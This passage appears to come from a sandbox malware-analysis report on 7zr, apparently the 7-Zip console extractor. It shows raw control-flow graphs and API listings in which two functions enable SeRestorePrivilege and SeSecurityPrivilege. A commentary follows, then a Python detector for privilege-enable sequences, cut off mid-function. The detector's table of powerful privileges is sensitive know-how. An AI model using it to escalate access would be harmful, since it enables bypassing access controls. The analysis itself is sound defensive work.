calls 2 library calls 75199->75305 75201 3a0ea6 75307 3cec78 free ctype 75201->75307 75202 3a0d11 75299 387496 7 API calls 2 library calls 75202->75299 75203 3a0c13 75296 381e40 free 75203->75296 75204 3a0c83 75204->75199 75204->75202 75206 382da9 2 API calls 75206->75265 75210 382da9 2 API calls 75248 3a0ab5 75210->75248 75211 3a0e47 75211->75201 75306 3a117d 68 API calls 2 library calls 75211->75306 75212 3a0de0 75301 3b2db9 free ctype 75212->75301 75214 382f1c 2 API calls 75242 3a0d29 75214->75242 75215 3a0df8 75303 381e40 free 75215->75303 75216 382e04 2 API calls 75216->75265 75218 382e04 2 API calls 75218->75248 75221 3a0e02 75304 3b2db9 free ctype 75221->75304 75223 382e04 2 API calls 75223->75242 75225 382fec 3 API calls 75225->75265 75229 382fec 3 API calls 75229->75242 75230 382fec 3 API calls 75230->75248 75234 3a050b 44 API calls 75234->75248 75236 3a0b26 75288 381e40 free 75236->75288 75237 3a0df3 75302 381e40 free 75237->75302 75240 381e40 free ctype 75240->75242 75241 3c04d2 malloc _CxxThrowException free _CxxThrowException memcpy 75241->75265 75242->75212 75242->75214 75242->75215 75242->75223 75242->75229 75242->75237 75242->75240 75300 3a117d 68 API calls 2 library calls 75242->75300 75244 3a0b30 75289 381e40 free 75244->75289 75245 3a0c79 75298 381e40 free 75245->75298 75248->75203 75248->75210 75248->75218 75248->75230 75248->75234 75248->75245 75251 381e40 free ctype 75248->75251 75287 382f4a malloc _CxxThrowException free ctype 75248->75287 75292 381089 malloc _CxxThrowException free _CxxThrowException 75248->75292 75293 3a13eb 5 API calls 2 library calls 75248->75293 75294 3a0ef4 68 API calls 2 library calls 75248->75294 75295 3b2db9 free ctype 75248->75295 75297 3a0021 GetLastError 75248->75297 75249 3a0b38 75290 381e40 free 75249->75290 75251->75248 75260 381524 malloc _CxxThrowException 75260->75265 75261 3a0b48 75291 3b2db9 free ctype 75261->75291 75264 381e40 free ctype 75264->75265 75265->75198 75265->75204 75265->75206 75265->75216 
75265->75225 75265->75236 75265->75241 75265->75248 75265->75260 75265->75261 75265->75264 75266 3b2db9 free ctype 75265->75266 75270 382f4a malloc _CxxThrowException free ctype 75265->75270 75271 381089 malloc _CxxThrowException free _CxxThrowException 75265->75271 75272 3a13eb 5 API calls 2 library calls 75265->75272 75273 3a050b 75265->75273 75278 3a0021 GetLastError 75265->75278 75279 3849bd 9 API calls 2 library calls 75265->75279 75280 3a0306 12 API calls 75265->75280 75281 39ff00 5 API calls 2 library calls 75265->75281 75282 3a057d 16 API calls 2 library calls 75265->75282 75283 3a0f8e 24 API calls 2 library calls 75265->75283 75284 38472e CharUpperW 75265->75284 75285 398984 malloc _CxxThrowException free _CxxThrowException memcpy 75265->75285 75286 3a0ef4 68 API calls 2 library calls 75265->75286 75266->75265 75267->75152 75268->75149 75269->75151 75270->75265 75271->75265 75272->75265 75274 386c72 44 API calls 75273->75274 75277 3a051e 75274->75277 75275 3a0575 75275->75265 75276 382f88 3 API calls 75276->75275 75277->75275 75277->75276 75278->75265 75279->75265 75280->75265 75281->75265 75282->75265 75283->75265 75284->75265 75285->75265 75286->75265 75287->75248 75288->75244 75289->75249 75290->75198 75291->75236 75292->75248 75293->75248 75294->75248 75295->75248 75296->75198 75297->75248 75298->75204 75299->75242 75300->75242 75301->75198 75302->75215 75303->75221 75304->75198 75305->75211 75306->75211 75307->75198 75309 3890e4 __EH_prolog 75308->75309 75310 382f88 3 API calls 75309->75310 75312 3890f7 75310->75312 75311 38915d 75313 382e04 2 API calls 75311->75313 75312->75311 75317 389109 75312->75317 75314 389165 75313->75314 75315 3891be 75314->75315 75318 389174 75314->75318 75354 386332 6 API calls 2 library calls 75315->75354 75319 382e47 2 API calls 75317->75319 75331 389155 75317->75331 75320 382f88 3 API calls 75318->75320 75323 389122 75319->75323 75322 38917d 75320->75322 75321 3891ca 75359 381e40 free 75321->75359 75322->75321 75352 
38859e malloc _CxxThrowException free _CxxThrowException 75322->75352 75349 388f57 memmove 75323->75349 75326 38912e 75329 38914d 75326->75329 75350 3831e5 malloc _CxxThrowException free _CxxThrowException 75326->75350 75328 389185 75333 382e04 2 API calls 75328->75333 75351 381e40 free 75329->75351 75331->74937 75334 389197 75333->75334 75335 3891ce 75334->75335 75336 38919f 75334->75336 75338 382f88 3 API calls 75335->75338 75337 3891b9 75336->75337 75353 381089 malloc _CxxThrowException free _CxxThrowException 75336->75353 75355 383199 malloc _CxxThrowException free _CxxThrowException 75337->75355 75338->75337 75341 3891e6 75356 388f57 memmove 75341->75356 75343 3891ee 75344 3891f2 75343->75344 75345 382fec 3 API calls 75343->75345 75358 381e40 free 75344->75358 75347 389212 75345->75347 75357 3831e5 malloc _CxxThrowException free _CxxThrowException 75347->75357 75349->75326 75350->75329 75351->75331 75352->75328 75353->75337 75354->75322 75355->75341 75356->75343 75357->75344 75358->75321 75359->75331 75361 3b5689 75360->75361 75362 3b56b1 75360->75362 75364 3b5593 6 API calls 75361->75364 75378 3b5593 75362->75378 75366 3b56a5 75364->75366 75368 3828a1 5 API calls 75366->75368 75368->75362 75370 3b570e fputs 75376 381fa0 fputc 75370->75376 75372 3b56ef 75373 3b5593 6 API calls 75372->75373 75374 3b5701 75373->75374 75375 3b5711 6 API calls 75374->75375 75375->75370 75376->74974 75377->74976 75379 3b55ad 75378->75379 75380 3828a1 5 API calls 75379->75380 75381 3b55b8 75380->75381 75382 38286d 5 API calls 75381->75382 75383 3b55bf 75382->75383 75384 3828a1 5 API calls 75383->75384 75385 3b55c7 75384->75385 75386 3b5711 75385->75386 75387 3b56e0 75386->75387 75388 3b5721 75386->75388 75387->75370 75392 382881 malloc _CxxThrowException free memcpy _CxxThrowException 75387->75392 75389 3828a1 5 API calls 75388->75389 75390 3b572b 75389->75390 75393 3b55cd 6 API calls 75390->75393 75392->75372 75393->75387 75394->74982 75404 381e40 free 75395->75404 75397 3a2c16 
75405 381e40 free 75397->75405 75399 3a2c1e 75400 381e40 free 75399->75400 75400->74986 75401->74988 75402->74990 75403->74992 75404->75397 75405->75399 76225 387b20 76228 387ab2 76225->76228 76229 387ac5 76228->76229 76236 38759a 76229->76236 76232 387b03 76250 387919 76232->76250 76233 387aeb SetFileTime 76233->76232 76237 3875a4 __EH_prolog 76236->76237 76266 38764c 76237->76266 76239 3875af 76240 3875e9 76239->76240 76241 3875d4 CreateFileW 76239->76241 76249 387632 76239->76249 76242 382e04 2 API calls 76240->76242 76240->76249 76241->76240 76243 3875fb 76242->76243 76269 388b4a 76243->76269 76245 387611 76246 38762a 76245->76246 76247 387615 CreateFileW 76245->76247 76274 381e40 free 76246->76274 76247->76246 76249->76232 76249->76233 76251 387aac 76250->76251 76252 38793c 76250->76252 76252->76251 76253 387945 DeviceIoControl 76252->76253 76254 387969 76253->76254 76255 3879e6 76253->76255 76254->76255 76261 3879a7 76254->76261 76256 3879ef DeviceIoControl 76255->76256 76257 387a14 76255->76257 76256->76257 76258 387a22 DeviceIoControl 76256->76258 76257->76251 76393 38780d 8 API calls ctype 76257->76393 76258->76257 76259 387a44 DeviceIoControl 76258->76259 76259->76257 76392 389252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 76261->76392 76262 387aa5 76264 3877de 5 API calls 76262->76264 76264->76251 76265 3879d0 76265->76255 76267 387661 76266->76267 76268 387656 CloseHandle 76266->76268 76267->76239 76268->76267 76275 388b80 76269->76275 76271 388b6e 76271->76245 76273 382f88 3 API calls 76273->76271 76274->76249 76277 388b8a __EH_prolog 76275->76277 76276 388b55 76276->76271 76276->76273 76277->76276 76278 388c7b 76277->76278 76284 388be1 76277->76284 76279 388d23 76278->76279 76281 388c8f 76278->76281 76280 388e8a 76279->76280 76283 388d3b 76279->76283 76282 382e47 2 API calls 76280->76282 76281->76283 76287 388c9e 76281->76287 76285 388e96 76282->76285 76286 382e04 2 API calls 76283->76286 76284->76276 76288 382e47 2 API calls 76284->76288 76293 
382e47 2 API calls 76285->76293 76289 388d43 76286->76289 76290 382e47 2 API calls 76287->76290 76291 388c05 76288->76291 76372 386332 6 API calls 2 library calls 76289->76372 76303 388ca7 76290->76303 76298 388c24 76291->76298 76299 388c17 76291->76299 76295 388eb8 76293->76295 76294 388d52 76296 388d56 76294->76296 76373 38859e malloc _CxxThrowException free _CxxThrowException 76294->76373 76384 388f57 memmove 76295->76384 76383 381e40 free 76296->76383 76301 382e47 2 API calls 76298->76301 76362 381e40 free 76299->76362 76306 388c35 76301->76306 76307 382e47 2 API calls 76303->76307 76305 388ec4 76308 388ec8 76305->76308 76309 388ede 76305->76309 76363 388f57 memmove 76306->76363 76313 388cd0 76307->76313 76385 381e40 free 76308->76385 76387 383221 malloc _CxxThrowException free _CxxThrowException 76309->76387 76367 388f57 memmove 76313->76367 76314 388ed0 76386 381e40 free 76314->76386 76315 388c41 76319 388c6b 76315->76319 76364 3831e5 malloc _CxxThrowException free _CxxThrowException 76315->76364 76316 388eeb 76388 3831e5 malloc _CxxThrowException free _CxxThrowException 76316->76388 76366 381e40 free 76319->76366 76320 388cdc 76323 388d13 76320->76323 76368 383221 malloc _CxxThrowException free _CxxThrowException 76320->76368 76371 381e40 free 76323->76371 76326 388f06 76389 3831e5 malloc _CxxThrowException free _CxxThrowException 76326->76389 76327 388c73 76391 381e40 free 76327->76391 76329 382e04 2 API calls 76334 388ddf 76329->76334 76330 388c60 76365 3831e5 malloc _CxxThrowException free _CxxThrowException 76330->76365 76332 388ced 76369 3831e5 malloc _CxxThrowException free _CxxThrowException 76332->76369 76339 388e0e 76334->76339 76342 388df1 76334->76342 76336 388f11 76390 381e40 free 76336->76390 76337 388d65 76337->76296 76337->76329 76343 382f88 3 API calls 76339->76343 76341 388d08 76370 3831e5 malloc _CxxThrowException free _CxxThrowException 76341->76370 76374 383199 malloc _CxxThrowException free _CxxThrowException 76342->76374 76344 388e0c 
76343->76344 76376 388f57 memmove 76344->76376 76348 388e03 76375 383199 malloc _CxxThrowException free _CxxThrowException 76348->76375 76349 388e22 76351 388e26 76349->76351 76352 388e3b 76349->76352 76377 383221 malloc _CxxThrowException free _CxxThrowException 76349->76377 76382 381e40 free 76351->76382 76378 388f34 malloc _CxxThrowException 76352->76378 76356 388e49 76379 3831e5 malloc _CxxThrowException free _CxxThrowException 76356->76379 76358 388e56 76380 381e40 free 76358->76380 76360 388e62 76381 3831e5 malloc _CxxThrowException free _CxxThrowException 76360->76381 76362->76276 76363->76315 76364->76330 76365->76319 76366->76327 76367->76320 76368->76332 76369->76341 76370->76323 76371->76327 76372->76294 76373->76337 76374->76348 76375->76344 76376->76349 76377->76352 76378->76356 76379->76358 76380->76360 76381->76351 76382->76296 76383->76276 76384->76305 76385->76314 76386->76276 76387->76316 76388->76326 76389->76336 76390->76327 76391->76276 76392->76265 76393->76262 76394 3cbf67 76395 3cbf85 76394->76395 76396 3cbf74 76394->76396 76396->76395 76400 3cbf8c 76396->76400 76401 3cbf96 __EH_prolog 76400->76401 76417 3cd144 76401->76417 76405 3cbfd0 76424 381e40 free 76405->76424 76407 3cbfdb 76425 381e40 free 76407->76425 76409 3cbfe6 76426 3cc072 free ctype 76409->76426 76411 3cbff4 76427 39aafa free VariantClear ctype 76411->76427 76413 3cc023 76428 3a73d2 free VariantClear __EH_prolog ctype 76413->76428 76415 3cbf7f 76416 381e40 free 76415->76416 76416->76395 76419 3cd14e __EH_prolog 76417->76419 76429 3cd1b7 76419->76429 76422 3cbfc5 76423 381e40 free 76422->76423 76423->76405 76424->76407 76425->76409 76426->76411 76427->76413 76428->76415 76437 3cd23c 76429->76437 76431 3cd1ed 76444 381e40 free 76431->76444 76433 3cd209 76445 381e40 free 76433->76445 76435 3cd180 76436 3c8e04 memset 76435->76436 76436->76422 76446 3cd2b8 76437->76446 76440 3cd25e 76463 381e40 free 76440->76463 76443 3cd275 76443->76431 76444->76433 76445->76435 76465 381e40 free 
76446->76465 76448 3cd2c8 76466 381e40 free 76448->76466 76450 3cd2dc 76467 381e40 free 76450->76467 76452 3cd2e7 76468 381e40 free 76452->76468 76454 3cd2f2 76469 381e40 free 76454->76469 76456 3cd2fd 76470 381e40 free 76456->76470 76458 3cd308 76471 381e40 free 76458->76471 76460 3cd313 76461 3cd246 76460->76461 76472 381e40 free 76460->76472 76461->76440 76464 381e40 free 76461->76464 76463->76443 76464->76440 76465->76448 76466->76450 76467->76452 76468->76454 76469->76456 76470->76458 76471->76460 76472->76461 76473 3bc2e6 76474 3bc52f 76473->76474 76477 3b544f SetConsoleCtrlHandler 76474->76477 76476 3bc53b 76477->76476 76478 417da0 WaitForSingleObject 76479 417dc1 76478->76479 76480 417dbb GetLastError 76478->76480 76481 417ddf 76479->76481 76482 417dce CloseHandle 76479->76482 76480->76479 76482->76481 76483 417dd9 GetLastError 76482->76483 76483->76481 76484 38b5d9 76485 38b5f7 76484->76485 76486 38b5e6 76484->76486 76486->76485 76490 38b5fe 76486->76490 76491 38b608 __EH_prolog 76490->76491 76497 406a40 VirtualFree 76491->76497 76493 38b63d 76494 38764c CloseHandle 76493->76494 76495 38b5f1 76494->76495 76496 381e40 free 76495->76496 76496->76485 76497->76493 76498 406ba3 VirtualFree 76499 391ade 76500 391ae8 __EH_prolog 76499->76500 76550 3813f5 76500->76550 76503 391b32 6 API calls 76505 391b8d 76503->76505 76511 391bf8 76505->76511 76568 391ea4 9 API calls 76505->76568 76506 391b24 _CxxThrowException 76506->76503 76508 391bdf 76509 3827bb 3 API calls 76508->76509 76510 391bec 76509->76510 76569 381e40 free 76510->76569 76513 391c89 76511->76513 76570 3a1d73 5 API calls __EH_prolog 76511->76570 76564 391eb9 76513->76564 76518 391cb2 _CxxThrowException 76518->76513 76551 3813ff __EH_prolog 76550->76551 76552 3a7ebb free 76551->76552 76553 38142b 76552->76553 76554 381438 76553->76554 76571 381212 free ctype 76553->76571 76556 381e0c ctype 2 API calls 76554->76556 76560 38144d 76556->76560 76557 3814f4 76557->76503 76567 3a1d73 5 API calls __EH_prolog 
76557->76567 76558 3c04d2 5 API calls 76558->76560 76560->76557 76560->76558 76562 381507 76560->76562 76572 381265 5 API calls 2 library calls 76560->76572 76573 381524 malloc _CxxThrowException __EH_prolog ctype 76560->76573 76563 382fec 3 API calls 76562->76563 76563->76557 76574 389313 GetCurrentProcess OpenProcessToken 76564->76574 76567->76506 76568->76508 76569->76511 76570->76518 76571->76554 76572->76560 76573->76560 76575 38933a LookupPrivilegeValueW 76574->76575 76576 389390 76574->76576 76577 38934c AdjustTokenPrivileges 76575->76577 76578 389382 76575->76578 76577->76578 76579 389372 GetLastError 76577->76579 76580 389385 CloseHandle 76578->76580 76579->76580 76580->76576 76581 3bacd3 76582 3bacf1 76581->76582 76583 3bace0 76581->76583 76583->76582 76587 3bacf8 76583->76587 76588 3bc0b3 __EH_prolog 76587->76588 76591 3a7193 free 76588->76591 76592 3bc0ed 76588->76592 76595 381e40 free 76588->76595 76590 3baceb 76594 381e40 free 76590->76594 76591->76588 76596 381e40 free 76592->76596 76594->76582 76595->76588 76596->76590 76597 3842d1 76598 3842bd 76597->76598 76599 3842c5 76598->76599 76600 381e0c ctype 2 API calls 76598->76600 76600->76599 76604 4069f0 free 76605 41ffb1 __setusermatherr 76606 41ffbd 76605->76606 76610 420068 _controlfp 76606->76610 76608 41ffc2 _initterm __getmainargs _initterm __p___initenv 76609 3bc27c 76608->76609 76610->76608 76611 3ad948 76641 3adac7 76611->76641 76613 3ad94f 76614 382e04 2 API calls 76613->76614 76615 3ad97b 76614->76615 76616 382e04 2 API calls 76615->76616 76617 3ad987 76616->76617 76620 3ad9e7 76617->76620 76649 386404 76617->76649 76622 3ada0f 76620->76622 76623 3ada36 76620->76623 76674 381e40 free 76622->76674 76625 3ada94 76623->76625 76631 382da9 2 API calls 76623->76631 76637 3c04d2 5 API calls 76623->76637 76676 381524 malloc _CxxThrowException __EH_prolog ctype 76623->76676 76677 381e40 free 76623->76677 76678 381e40 free 76625->76678 76627 3ad9bf 76672 381e40 free 76627->76672 76628 3ada17 76675 
381e40 free 76628->76675 76631->76623 76633 3ad9c7 76673 381e40 free 76633->76673 76634 3ada9c 76679 381e40 free 76634->76679 76637->76623 76638 3ad9cf 76642 3adad1 __EH_prolog 76641->76642 76643 382e04 2 API calls 76642->76643 76644 3adb33 76643->76644 76645 382e04 2 API calls 76644->76645 76646 3adb3f 76645->76646 76647 382e04 2 API calls 76646->76647 76648 3adb55 76647->76648 76648->76613 76650 38631f 9 API calls 76649->76650 76651 386414 76650->76651 76652 386423 76651->76652 76653 382f88 3 API calls 76651->76653 76654 382f88 3 API calls 76652->76654 76653->76652 76655 38643d 76654->76655 76656 397e5a 76655->76656 76657 397e64 __EH_prolog 76656->76657 76680 398179 76657->76680 76660 3a7ebb free 76661 397e7f 76660->76661 76662 382fec 3 API calls 76661->76662 76663 397e9a 76662->76663 76664 382da9 2 API calls 76663->76664 76665 397ea7 76664->76665 76666 386c72 44 API calls 76665->76666 76667 397eb7 76666->76667 76685 381e40 free 76667->76685 76669 397ecb 76670 397ed8 76669->76670 76686 38757d GetLastError 76669->76686 76670->76620 76670->76627 76672->76633 76673->76638 76674->76628 76675->76638 76676->76623 76677->76623 76678->76634 76679->76638 76683 398906 76680->76683 76681 397e77 76681->76660 76683->76681 76687 398804 free ctype 76683->76687 76688 381e40 free 76683->76688 76685->76669 76686->76670 76687->76683 76688->76683 76689 3ad3c2 76690 3ad3e9 76689->76690 76691 38965d VariantClear 76690->76691 76692 3ad42a 76691->76692 76693 3ad883 2 API calls 76692->76693 76694 3ad4b1 76693->76694 76780 3a8d4a 76694->76780 76697 3a8b05 VariantClear 76699 3ad4e3 76697->76699 76698 3a2a72 2 API calls 76700 3ad54c 76698->76700 76699->76698 76701 382fec 3 API calls 76700->76701 76702 3ad594 76701->76702 76703 3ad5cd 76702->76703 76704 3ad742 76702->76704 76705 3ad7d9 76703->76705 76797 3a9317 76703->76797 76812 3acd49 malloc _CxxThrowException free 76704->76812 76815 381e40 free 76705->76815 76708 3ad754 76711 382fec 3 API calls 76708->76711 76714 3ad763 76711->76714 76712 
3ad7e1 76816 381e40 free 76712->76816 76713 3ad5f1 76717 3c04d2 5 API calls 76713->76717 76813 381e40 free 76714->76813 76716 3ad7e9 76719 3a326b free 76716->76719 76720 3ad5f9 76717->76720 76731 3ad69a 76719->76731 76803 3ae332 76720->76803 76721 3ad76b 76814 381e40 free 76721->76814 76724 3ad773 76726 3a326b free 76724->76726 76726->76731 76728 3ad610 76810 381e40 free 76728->76810 76730 3ad618 76732 3a326b free 76730->76732 76733 3ad2a8 76732->76733 76733->76731 76755 3ad883 76733->76755 76736 382fec 3 API calls 76737 3ad361 76736->76737 76738 382fec 3 API calls 76737->76738 76739 3ad36d 76738->76739 76767 3ad0e1 76739->76767 76741 3ad380 76742 3ad38a 76741->76742 76743 3ad665 76741->76743 76745 3c04d2 5 API calls 76742->76745 76744 3ad68b 76743->76744 76811 3acd49 malloc _CxxThrowException free 76743->76811 76747 3a326b free 76744->76747 76748 3ad392 76745->76748 76747->76731 76750 3ae332 2 API calls 76748->76750 76749 3ad67c 76751 382fec 3 API calls 76749->76751 76752 3ad3a1 76750->76752 76751->76744 76753 3a326b free 76752->76753 76754 3ad3b0 76753->76754 76756 3ad88d __EH_prolog 76755->76756 76757 382e04 2 API calls 76756->76757 76758 3ad8c6 76757->76758 76759 382e04 2 API calls 76758->76759 76760 3ad8d2 76759->76760 76761 382e04 2 API calls 76760->76761 76762 3ad8de 76761->76762 76763 3a2b63 2 API calls 76762->76763 76764 3ad8fa 76763->76764 76765 3a2b63 2 API calls 76764->76765 76766 3ad34f 76765->76766 76766->76736 76768 3ad0eb __EH_prolog 76767->76768 76769 3ad10b 76768->76769 76770 3ad138 76768->76770 76771 381e0c ctype 2 API calls 76769->76771 76772 381e0c ctype 2 API calls 76770->76772 76773 3ad112 76770->76773 76771->76773 76774 3ad14b 76772->76774 76773->76741 76775 382fec 3 API calls 76774->76775 76776 3ad17b 76775->76776 76817 387b41 28 API calls 76776->76817 76778 3ad18a 76778->76773 76818 38757d GetLastError 76778->76818 76788 3a8d54 __EH_prolog 76780->76788 76781 3a8e09 76783 38965d VariantClear 76781->76783 76782 3a8e15 76784 3a8e2d 
                        Control-flow graph edge list (continuation of the preceding function's graph, node addresses 3a8e11-3d14e7): chains of VariantClear, SysAllocStringLen and SysStringLen, malloc/free/_CxxThrowException and memcpy/memmove/memset calls; one path through GetCurrentProcess/GetProcessAffinityMask, GetSystemInfo and GetModuleHandleA/GetProcAddress to GlobalMemoryStatusEx (with GlobalMemoryStatus as the fallback when the export is not resolved); one path through SetEvent, CloseHandle and GetLastError. The raw node and edge listing is omitted.

                        Control-flow Graph

                        control_flow_graph 1073 389313-389338 GetCurrentProcess OpenProcessToken 1074 38933a-38934a LookupPrivilegeValueW 1073->1074 1075 389390 1073->1075 1076 38934c-389370 AdjustTokenPrivileges 1074->1076 1077 389382 1074->1077 1078 389393-389398 1075->1078 1076->1077 1079 389372-389380 GetLastError 1076->1079 1080 389385-38938e CloseHandle 1077->1080 1079->1080 1080->1078
                        APIs
                        • GetCurrentProcess.KERNEL32(00000020,00391EC5,?,7597AB50,?,?,?,?,00391EC5,00391CEF), ref: 00389329
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00391EC5,00391CEF), ref: 00389330
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00389342
                        • AdjustTokenPrivileges.KERNELBASE(00391EC5,00000000,?,00000000,00000000,00000000), ref: 00389368
                        • GetLastError.KERNEL32 ref: 00389372
                        • CloseHandle.KERNELBASE(00391EC5,?,?,?,?,00391EC5,00391CEF), ref: 00389388
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeRestorePrivilege
                        • API String ID: 3398352648-1684392131
                        • Opcode ID: a0c374470b4c93386b228be09f8d07356e2479da721f265ea30a71ff75efc764
                        • Instruction ID: c495b2537a895e0dc6ae60e20d7f2fa9f4298073e51f30bb4de246f93201f65c
                        • Opcode Fuzzy Hash: a0c374470b4c93386b228be09f8d07356e2479da721f265ea30a71ff75efc764
                        • Instruction Fuzzy Hash: 04018475A45214ABCB215FF19C89BEE7F7CEF06340F4801A5E941E2190D6B48605D7A4

                        Control-flow Graph

                        control_flow_graph 1081 393d66-393d9c call 41fb10 GetCurrentProcess call 393e04 OpenProcessToken 1086 393d9e-393dbe LookupPrivilegeValueW 1081->1086 1087 393de3-393dfe call 393e04 1081->1087 1086->1087 1088 393dc0-393dd3 AdjustTokenPrivileges 1086->1088 1088->1087 1090 393dd5-393de1 GetLastError 1088->1090 1090->1087
                        APIs
                        • __EH_prolog.LIBCMT ref: 00393D6B
                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D7D
                        • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D94
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00393DB6
                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DCB
                        • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DD5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeSecurityPrivilege
                        • API String ID: 3475889169-2333288578
                        • Opcode ID: 31c176a1eb9eeb8bec16a5e3a51817108438e16762a47eb2e9d977dfbced1e87
                        • Instruction ID: 4d151035c9a791a4c3a6c7e8da24d6791a49262d88d0385553be374aea523bcd
                        • Opcode Fuzzy Hash: 31c176a1eb9eeb8bec16a5e3a51817108438e16762a47eb2e9d977dfbced1e87
                        • Instruction Fuzzy Hash: EF110CB1A41119AFDF21AFE5DCD5AFEBBBCFF04344F404529E412E2191D7748A09CA64
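
                        The two functions above (00389313 and 00393D66) each open the current process token, look up a privilege by name (SeRestorePrivilege at 00389342, SeSecurityPrivilege at 00393DB6), call AdjustTokenPrivileges and then read GetLastError; that sequence is what the "Enables security privileges" signature in the overview keys on. SeRestorePrivilege lets the holder write files and registry keys regardless of their ACL, and SeSecurityPrivilege grants access to object SACLs (audit settings). Both are privileges an archiver needs to restore NTFS security descriptors, consistent with this module being the 7-Zip console extractor (the snapshot file is named 7zr and the strings further down include 7zCon.sfx), so the signature by itself does not separate the installer's payload from its unpacker; which privileges are requested, and from which module, is the useful detail. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses API listings in this page's "• Api.MODULE(args), ref: ADDR" format and extracts the privilege-enable sequences, using the two listings above as its constructed input. The function-splitting heuristic (a new function starts at __EH_prolog or at a large address jump) and the privilege-effect table are the example's own assumptions, not report metadata.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the API listings of the two functions above
# (00389313 and 00393D66 of the 7zr module), copied from this report.
SAMPLE = """\
• GetCurrentProcess.KERNEL32(00000020,00391EC5,?,7597AB50,?,?,?,?,00391EC5,00391CEF), ref: 00389329
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00391EC5,00391CEF), ref: 00389330
• LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00389342
• AdjustTokenPrivileges.KERNELBASE(00391EC5,00000000,?,00000000,00000000,00000000), ref: 00389368
• GetLastError.KERNEL32 ref: 00389372
• CloseHandle.KERNELBASE(00391EC5,?,?,?,?,00391EC5,00391CEF), ref: 00389388
• __EH_prolog.LIBCMT ref: 00393D6B
• GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D7D
• OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D94
• LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00393DB6
• AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DCB
• GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DD5
"""

CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"   # OpenProcessToken.ADVAPI32
    r"(?:\((?P<args>[^)]*)\))?"                  # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"     # address of the call site
)

# Assumed reference table: what an enabled privilege lets the process do.
PRIVILEGE_EFFECT = {
    "SeRestorePrivilege": "write any file or registry key regardless of its ACL",
    "SeSecurityPrivilege": "read and modify SACLs (audit settings)",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeDebugPrivilege": "open any process, including protected ones",
    "SeLoadDriverPrivilege": "load a kernel driver",
}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int


@dataclass
class PrivilegeEnable:
    privilege: str
    first_call: int       # address of the first listed call of the function
    lookup_ref: int       # LookupPrivilegeValue call site
    adjust_ref: int       # AdjustTokenPrivileges call site
    result_checked: bool  # GetLastError is read right after AdjustTokenPrivileges


def parse_calls(text):
    """Parse "• Api.MODULE(args), ref: ADDR" lines; any other line is ignored."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue  # e.g. "Part of subcall function ..." lines
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def split_functions(calls, max_gap=0x400):
    """Split a concatenated listing into per-function call lists.

    Assumption: one function's calls are listed in ascending address order, so a
    new function starts at __EH_prolog, when the address goes backwards, or after
    a jump of more than max_gap bytes.
    """
    functions, current = [], []
    for c in calls:
        if current and (c.api == "__EH_prolog" or c.ref < current[-1].ref
                        or c.ref - current[-1].ref > max_gap):
            functions.append(current)
            current = []
        current.append(c)
    if current:
        functions.append(current)
    return functions


def find_privilege_enables(calls):
    """One PrivilegeEnable per OpenProcessToken -> LookupPrivilegeValue ->
    AdjustTokenPrivileges sequence found inside a single function."""
    findings = []
    for fn in split_functions(calls):
        if not any(c.api == "OpenProcessToken" for c in fn):
            continue
        for i, c in enumerate(fn):
            # LookupPrivilegeValue(lpSystemName, lpName, lpLuid): lpName is args[1]
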